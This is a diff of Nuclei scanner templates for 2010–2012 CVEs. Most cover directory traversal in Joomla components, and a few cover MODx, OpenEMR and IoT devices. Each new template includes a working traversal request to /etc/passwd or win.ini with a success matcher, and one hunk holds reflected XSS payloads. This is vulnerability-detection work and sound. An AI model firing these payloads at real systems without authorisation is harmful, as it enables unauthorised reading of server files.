|
- "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1717
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12291
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1717
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1718
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12282
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1718
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1722
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Online Market 2.x - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12177
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1722
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1875
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Property - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11851
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1875
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1953
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12288
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1953
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1954
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12287
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1954
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1955
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12238
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1955
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/12088
|
- https://www.exploit-db.com/exploits/12088
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-1979
|
- https://www.cvedetails.com/cve/CVE-2010-1979
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1980
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12085
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1980
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1981
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12087
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1981
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
|
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/12055
|
- https://www.exploit-db.com/exploits/12055
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-1983
|
- https://www.cvedetails.com/cve/CVE-2010-1983
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2033
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2033
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2035
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34006
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2035
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2036
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34004
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2036
|
||||||
|
tags: cve,cve2010,lfi,joomla
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-2122
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12623
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-2122
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/10946
|
- https://www.exploit-db.com/exploits/10946
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-2259
|
- https://www.cvedetails.com/cve/CVE-2010-2259
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.securityfocus.com/bid/40550/info
|
- https://www.securityfocus.com/bid/40550/info
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
||||||
tags: cve,cve2010,iot,lfi
|
tags: cve,cve2010,iot,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/14017
|
- https://www.exploit-db.com/exploits/14017
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-2682
|
- https://www.cvedetails.com/cve/CVE-2010-2682
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-3426
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/14964
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-3426
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
||||||
reference: |
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
||||||
- https://www.exploit-db.com/exploits/15505
|
- https://www.exploit-db.com/exploits/15505
|
||||||
tags: cve,cve2010,iot,lfi
|
tags: cve,cve2010,iot,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/15791
|
- https://www.exploit-db.com/exploits/15791
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-4617
|
- https://www.cvedetails.com/cve/CVE-2010-4617
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2010-5278
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MODx manager - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/34788
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-5278
|
||||||
|
tags: cve,cve2010,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "bit app support"
|
||||||
|
- "fonts"
|
||||||
|
- "extensions"
|
||||||
|
condition: and
|
||||||
|
part: body
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
|
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
||||||
- https://www.exploit-db.com/exploits/17119
|
- https://www.exploit-db.com/exploits/17119
|
||||||
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/36598
|
- https://www.exploit-db.com/exploits/36598
|
||||||
- https://www.cvedetails.com/cve/CVE-2011-4804
|
- https://www.cvedetails.com/cve/CVE-2011-4804
|
||||||
tags: cve,cve2011,joomla,lfi
|
tags: cve,cve2011,joomla,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/36650
|
- https://www.exploit-db.com/exploits/36650
|
||||||
- https://www.cvedetails.com/cve/CVE-2012-0991
|
- https://www.cvedetails.com/cve/CVE-2012-0991
|
||||||
tags: cve,cve2012,lfi,openemr
|
tags: cve,cve2012,lfi,openemr
|
||||||
|
|
|
@ -12,10 +12,10 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/37129
|
- https://www.exploit-db.com/exploits/37129
|
||||||
- https://www.cvedetails.com/cve/CVE-2012-4253
|
- https://www.cvedetails.com/cve/CVE-2012-4253
|
||||||
tags: cve,cve2012,lfi
|
tags: cve,cve2012,lfi
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/37034
|
- https://www.exploit-db.com/exploits/37034
|
||||||
